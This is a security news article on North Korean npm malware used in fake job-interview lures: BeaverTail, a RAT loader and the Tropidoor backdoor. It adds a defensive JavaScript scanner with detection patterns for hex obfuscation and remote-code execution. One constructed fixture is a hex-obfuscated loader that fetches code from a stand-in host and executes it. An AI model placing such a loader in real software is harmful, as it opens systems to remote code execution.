North Korean Hackers Expand Contagious Interview Campaign with New Malware on npm Ecosystem
North Korean threat actors behind the ongoing Contagious Interview campaign are intensifying their attacks by spreading new malicious packages across the npm ecosystem, delivering not just the previously known BeaverTail malware, but also introducing a new remote access trojan (RAT) loader.
According to Socket security researcher Kirill Boychenko, the latest malware samples employ hexadecimal string encoding to better evade both automated detection tools and manual security audits, signaling an evolution in their obfuscation techniques.
The malicious npm packages, downloaded more than 5,600 times before being taken down, include:
- empty-array-validator
- twitterapis
- dev-debugger-vite
- snore-log
- core-pino
- events-utils
- icloud-cod
- cln-logger
- node-clog
- consolidate-log
- consolidate-logger
This discovery follows a previous finding where six npm packages were identified spreading BeaverTail, a JavaScript-based stealer capable of deploying a Python backdoor called InvisibleFerret.
The overall objective of the Contagious Interview campaign is to infiltrate developer environments, steal confidential data, siphon financial assets, and maintain long-term unauthorized access, all under the pretense of job recruitment processes.
The latest batch of malicious npm libraries is disguised as utility and debugging tools. Notably, the dev-debugger-vite package connects to a command-and-control (C2) server previously associated with the Lazarus Group's "Phantom Circuit" campaign uncovered in December 2024.
Some packages, such as events-utils and icloud-cod, link to Bitbucket repositories instead of GitHub, showcasing the attackers’ strategy to diversify their hosting methods. The icloud-cod package, hosted in a directory named "eiwork_hire," further ties into the job interview lure theme.
Analysis of the packages cln-logger, node-clog, consolidate-log, and consolidate-logger revealed small code variations, suggesting attackers are pushing multiple malware variants to boost their infection success rate. Despite minor differences, these variants function similarly as RAT loaders capable of pulling and executing additional malicious payloads from remote servers.
Although the exact malware being deployed through these loaders is still unknown—since their C2 servers are now inactive—the loader’s ability to dynamically execute remote JavaScript code makes it a serious threat, enabling attackers to deliver any malware they choose.
Boychenko emphasized that this activity highlights the persistent and adaptive nature of the Contagious Interview threat actors, who continue to create new npm accounts and distribute malicious code across npm, GitHub, and Bitbucket, showing no signs of slowing down. The group is reusing known malware like BeaverTail and InvisibleFerret, while introducing new RAT and loader variants to stay ahead.
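The two traits the article attributes to these packages, hexadecimal string encoding and a loader that fetches and executes remote JavaScript, are exactly what a package-audit heuristic can look for. The scanner below is an added example written for this article, not code from Socket, the packages, or the researchers; the regexes, thresholds, rule names and the two fixture snippets are all constructed assumptions to be tuned against a real corpus.

```javascript
// Heuristic scanner for npm package source (added example, not the article's code).
// Flags dense "\xNN" string encoding and the fetch-then-execute shape of a RAT loader.
const HEX_ESCAPE = /\\x[0-9a-fA-F]{2}/g;                     // "\x68\x74..." style escapes
const LONG_HEX_LITERAL = /['"`](?:[0-9a-fA-F]{2}){24,}['"`]/; // bare hex blob of >= 48 chars
const EXEC_SINKS = [
  [/\beval\s*\(/, 'eval()'],
  [/\bnew\s+Function\s*\(/, 'new Function()'],
  [/\bvm\.(?:runInThisContext|runInNewContext|Script)\b/, 'vm module'],
];
const NETWORK_SOURCES = [
  [/\brequire\(\s*['"](?:https?|axios|node-fetch)['"]\s*\)/, 'http client require'],
  [/\bfetch\s*\(/, 'fetch()'],
];

// Share of the file made up of \xNN escapes (each escape is 4 characters of source).
function hexEscapeDensity(src) {
  const count = (src.match(HEX_ESCAPE) || []).length;
  return src.length === 0 ? 0 : (count * 4) / src.length;
}

// Returns a list of findings; an empty list means nothing suspicious was matched.
function scanSource(src, { densityThreshold = 0.10 } = {}) {   // threshold is an assumption
  const findings = [];
  const density = hexEscapeDensity(src);
  if (density >= densityThreshold) {
    findings.push({ rule: 'hex-escape-density', detail: density.toFixed(2) });
  }
  if (LONG_HEX_LITERAL.test(src)) {
    findings.push({ rule: 'long-hex-literal', detail: 'bare hex string literal' });
  }
  const sinks = EXEC_SINKS.filter(([re]) => re.test(src)).map(([, name]) => name);
  const sources = NETWORK_SOURCES.filter(([re]) => re.test(src)).map(([, name]) => name);
  // Loader shape: something arrives over the network and is handed straight to an executor.
  if (sinks.length && sources.length) {
    findings.push({ rule: 'remote-code-execution-pattern', detail: `${sources} -> ${sinks}` });
  } else if (sinks.length) {
    findings.push({ rule: 'dynamic-exec', detail: sinks.join(',') });
  }
  return findings;
}

// Constructed fixtures, not real package code: a plain logging wrapper and a
// loader-like snippet whose URL is hex-escaped and whose response body is executed.
const BENIGN = `const pino = require('pino');\nmodule.exports = (msg) => pino().info(msg);\n`;
const SUSPICIOUS = `const h = require('https');\n` +
  `const u = '\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x63\\x32\\x2e\\x65\\x78\\x61\\x6d\\x70\\x6c\\x65';\n` +
  `h.get(u, r => { let b = ''; r.on('data', d => b += d); r.on('end', () => new Function(b)()); });\n`;
```

Run the scanner over every `.js` file in a package tarball before installing it; a hit on `remote-code-execution-pattern` together with high hex density is the combination worth a manual look.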
Tropidoor: A New Threat Unveiled
Meanwhile, South Korean cybersecurity firm AhnLab has uncovered a recruitment-themed phishing campaign involving BeaverTail, which later deploys a newly discovered Windows backdoor named Tropidoor.
The campaign involves phishing emails posing as companies like "AutoSquare," urging recipients to clone Bitbucket projects locally. These projects hide malicious components, with BeaverTail disguised in "tailwind.config.js" and a DLL downloader malware ("car.dll").
Tropidoor operates in memory via the downloader and communicates with a C2 server to execute commands such as file exfiltration, screenshot capture, process manipulation, and file wiping. The malware also directly uses Windows commands like schtasks, ping, and reg, echoing behaviors previously seen in Lazarus malware like LightlessCan and BLINDINGCAN.
AhnLab warns that users should be vigilant not just about email attachments but also executable files from unfamiliar sources, as attackers continue to innovate their methods of deception and infiltration.